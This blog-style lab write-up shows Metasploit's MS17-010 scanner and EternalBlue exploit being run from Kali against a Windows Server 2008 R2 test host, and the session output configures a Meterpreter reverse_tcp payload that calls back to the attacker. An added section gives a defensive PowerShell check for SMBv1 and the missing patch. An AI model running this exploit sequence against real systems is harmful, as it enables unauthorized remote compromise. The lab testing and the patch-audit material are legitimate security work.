One of a host engineer's daily chores is applying all kinds of patches to systems. I used to take this lightly and thought these patches were all optional. Recently I tried out the famous MS17-010 EternalBlue for myself, and that changed my mind.
Attacker host: Kali, 192.168.106.242
Target: Windows Server 2008 R2, 192.168.106.240
EternalBlue is old news by now, and Metasploit has since integrated the MS17-010 modules, which makes penetration testing more convenient and more formal. Testing an internal network with MS17-010 tends to turn up some unexpected surprises.
Searching turns up four related modules:
- auxiliary/admin/smb/ms17_010_command
- auxiliary/scanner/smb/smb_ms17_010
- exploit/windows/smb/ms17_010_eternalblue
- exploit/windows/smb/ms17_010_psexec
First, use auxiliary/scanner/smb/smb_ms17_010 to scan for servers that may be affected by MS17-010.
```
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) >
```
As you can see, the scanner reports the target host as vulnerable to MS17-010.
Next, use exploit/windows/smb/ms17_010_eternalblue to attack; here the payload is set to a Meterpreter payload.
```
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.106.240
rhosts => 192.168.106.240
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.106.242
lhost => 192.168.106.242
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.106.240  yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.106.242  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
```
The exploit succeeded, and from here on you can do whatever you like~~
So patches really do need to be applied diligently, especially for vulnerabilities on the level of EternalBlue. After all, the big vendors aren't paid to sit around.
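From the defender's side, the practical question after a test like this is "which of my hosts are still in the state the scanner just found?" The following PowerShell audit is an added example written for this post, not code from the original article or from Metasploit. It checks the two conditions EternalBlue depends on: the SMBv1 server being enabled, and the MS17-010 fix being absent. The KB identifiers are the March 2017 security-only and monthly-rollup updates for Windows 7 SP1 / Server 2008 R2 SP1 (an assumption you should adjust for other Windows versions), and the registry location is the documented SMBv1 switch for systems that lack the Get-SmbServerConfiguration cmdlet, which is the case on Server 2008 R2. Run it from an elevated PowerShell on the host being audited.

```powershell
# Added example (not from the original post): audit one Windows host for
# exposure to MS17-010. Assumptions: the KB list below matches the OS being
# audited (here: Windows 7 SP1 / Server 2008 R2 SP1), and later cumulative
# rollups that supersede these KBs are not installed. Treat a "missing"
# result as a signal to verify via WSUS/SCCM, not as proof of exposure.
$Ms17010Kbs = @('KB4012212', 'KB4012215')   # security-only / monthly rollup, March 2017

function Test-Smb1ServerEnabled {
    # Server 2008 R2 has no Get-SmbServerConfiguration; the registry value
    # is the switch Microsoft documents. If the value is absent, SMB1 is on.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $item = Get-ItemProperty -Path $key -Name 'SMB1' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $true }
    return ([int]$item.SMB1 -ne 0)
}

function Get-Ms17010PatchState {
    param([string[]]$KbIds = $Ms17010Kbs)
    # Get-HotFix lists installed update packages by their KB id.
    $installed = @(Get-HotFix -ErrorAction SilentlyContinue |
                   Where-Object { $KbIds -contains $_.HotFixID })
    [pscustomobject]@{
        ComputerName   = $env:COMPUTERNAME
        PatchInstalled = ($installed.Count -gt 0)
        MatchedKb      = (($installed | ForEach-Object { $_.HotFixID }) -join ',')
        Smb1Enabled    = (Test-Smb1ServerEnabled)
    }
}

function Disable-Smb1Server {
    # Mitigation for hosts that cannot be patched immediately. Takes effect
    # after the Server service restarts (a reboot is the safe choice).
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    Set-ItemProperty -Path $key -Name 'SMB1' -Type DWORD -Value 0 -Force
}

$state = Get-Ms17010PatchState
$state | Format-List

if (-not $state.PatchInstalled -and $state.Smb1Enabled) {
    Write-Warning "$($state.ComputerName): MS17-010 fix not found and SMBv1 server enabled. Patch now, or run Disable-Smb1Server as a stopgap."
} elseif ($state.Smb1Enabled) {
    Write-Warning "$($state.ComputerName): patched, but SMBv1 is still enabled; consider disabling it."
} else {
    Write-Host "$($state.ComputerName): no MS17-010 exposure detected by this check."
}
```

Two caveats worth keeping in mind when you roll this out across a fleet: Get-HotFix only reports packages that were installed as discrete updates, so a host that received the fix through a later cumulative rollup may not list the March 2017 KB at all, and disabling SMBv1 breaks any client that still relies on it (old NAS devices, some printers). The remote scan in the post and this host-side audit answer the same question from opposite ends; disagreement between them is exactly the case to investigate.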